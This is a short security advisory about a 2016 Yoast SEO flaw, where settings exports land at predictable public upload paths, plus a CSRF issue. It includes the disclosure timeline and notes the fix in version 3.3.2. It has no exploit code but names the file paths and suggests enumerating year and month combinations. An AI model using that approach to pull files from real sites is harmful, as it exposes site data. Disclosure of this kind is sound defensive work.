Information Disclosure Vulnerability in Yoast SEO
Recently the security company Wordfence released an advisory for the Yoast SEO plugin for what seems to be a rather minor issue. Logged in users could access several functions of Yoast SEO that they were not normally intended to have access to, including exporting the plugin’s settings. While reviewing that to include in to our service’s data we noticed that the related to this there was also a problem with cross-site request forgery (CSRF) protection in the export function of the plugin.
The fact the plugin now restricts the export function to Administrator level users (by restricting it to user who can manage_options) and there was supposed to be CSRF protection for it would indicate the result of that export should not be available to public. Though in normal circumstances it doesn’t look like sensitive data so the publics access to it seems to not to be a major issue at this point, but that could change, so making sure it is not easily accessible to the public seems like a good idea. Currently that isn’t the case.
When doing an export of the settings this month the file saved at:
/wp-content/uploads/2016/05/settings.zip
Last month it was saved at:
/wp-content/uploads/2016/04/settings.zip
Not only are files in that location normally accessible by the public, it would very easy for someone to request all of the possible file locations by making requests for all of the possible year and month combinations.
We notified the developer about this issue along side the CSRF issue on Friday, yesterday the indicated that it would be a month before they fixed the CSRF issue, but made no mention of this issue, so who knows if they are interested in fixing it. That would be fairly easy to do by simply adding a unique value to the name of the file.
Timeline
- 5/6/2016 – Developer notified.
- 5/10/2016 – Response from developer with no reply on this issue.
- 6/21/2016 – Version 3.3.2 released, which fixes vulnerability.